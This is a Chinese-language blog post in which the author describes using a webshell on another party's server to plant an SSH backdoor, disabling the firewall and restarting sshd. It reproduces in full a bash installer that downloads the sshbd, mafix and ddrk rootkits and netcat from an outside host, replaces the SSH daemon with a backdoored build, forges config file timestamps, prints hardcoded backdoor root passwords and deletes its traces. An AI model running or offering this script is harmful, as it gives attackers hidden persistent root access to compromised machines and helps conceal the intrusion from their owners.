SSH连接引发的血案

今天干了特脑残的一件事,机油丢我一jsp的shell。我试图帮他留一个ssh后门。 但是 光看了shell的提示的ip,有两个,都是公网地址。于是乎小弟很自然的认为其为公网独立IP。不过连接时总是超时。于是做了以下两件事:

1.service iptables stop     

2.service sshd restart  或者  ssh./etc/init.d/sshd restart

具体就是重启服务,关闭防火墙。   可是如此做以后还是发现connection  timeout。怎么办?又考虑了一个办法 ,      修改server端 的 /etc/ssh/sshd_config ClientAliveInterval设置为60,ClientAliveCountMax设置为3,至于Client端,ServerAliveInterval和  ServerAliveCountMax设置为类似。

附上ssh后门连接方法,

参考链接:

http://www.cnblogs.com/fnng/archive/2012/02/21/2362013.html  PUTTY直接连接用户

或者用xshell—> ssh [email protected]填入用户名输入密码

http://blog.163.com/lgh_2002/blog/static/44017526201011333227161/      SSH后门

参考linux后门速成shell脚本:

++++++++++++++++++++++++++++++++++++++++++++++++++

#!/bin/bash   clear   echo -e “\033[1;035m \n”   echo ‘###############################’   echo ‘#—————————–#’   echo ‘#   WelCome to [url]www.90sec.org[/url]  #’   echo ‘#         hello I is helen    #’   echo ‘#           By:Mr,PriNce      #’   echo ‘#—————————–#’   echo ‘###############################’   if [ $(id -u) != 0 ];then   echo sorry,!root….   exit 1   fi   if [[ $1 -gt 4 ]] || [[ $1 == “” ]];then   echo “###############################”   echo “#—————————–#”   echo “#      1:sshbd backdoor       #”   echo “#      2:mafix backdoor       #”   echo “#      3:ddrk  backdoor       #”   echo “#         4:Netcat            #”   echo “#—————————–#”   echo “###############################”   fi   ssh1=”http://www.gome.com.hk/attachment/mc/sshbd.gz   ssh2=”http://www.gome.com.hk/attachment/mc/mafix.tar.gz   ssh3=”http://www.gome.com.hk/attachment/mc/ddrk-rootkit.tar   ssh4=”http://www.gome.com.hk/attachment/mc/netcat.tar.gz   dir=”/tmp/”   if [[ $1 -eq 1 ]];then   port=$(grep Port /etc/ssh/sshd_config)   echo “Current ssh $port”   read -p Enter:   wget $ssh1 -O $dir/sshbd.gz   cd $dir   tar zxvf sshbd.gz   mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old   mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old   cd openssh   ./configure –prefix=/usr –sysconfdir=/etc/ssh   make && make install   touch -r /etc/ssh/sshd_config.old /etc/ssh/sshd_config   touch -r /etc/ssh/ssh_config.old /etc/ssh/ssh_config   /etc/init.d/sshd restart   echo Current ssh $port   echo “sshbd backdoor install ok”   echo “Username:root Password:995430aaa”   rm -rf /tmp/openssh /tmp/sshbd*   exit   fi   if [[ $1 -eq 2 ]];then   wget $ssh2 -O $dir/mafix.tar.gz   cd $dir   tar zxvf mafix*   cd mafix*   read -p “Enter Backdoor Passwords:” ID   read -p “Enter Backdoor ssh Port:” back   ./root $ID $back   echo “mafix backdoor install ok”   echo “Current Port:” $back   rm -rf /tmp/mafix*   exit   fi   if [[ $1 -eq 3 ]];then   wget $ssh3 -O $dir/ddrk-rootkit.tar   cd $dir   tar xvf ddrk-rootkit*   cd ddrk   ./setup   echo “ddrk backdoor install ok”   echo “Username:root Passwords:123456”   echo “Port:43958”   rm -rf /tmp/ddrk*   exit   fi   if [[ $1 -eq 4 ]]; then   wget $ssh4 -O $dir/netcat.tar.gz   cd $dir   tar zxvf netcat.tar.gz   cd netcat*   ./configure   make && make install   echo “Netcat install ok”   rm -rf /tmp/netcat*   exit   fi

++++++++++++++++++++++++++++++++++++++++++++++++++

感谢以上文章作者。

最后说一句,最后知道是内网是盆友惊醒俺ifconfig了一下。顿时觉得手贱了。。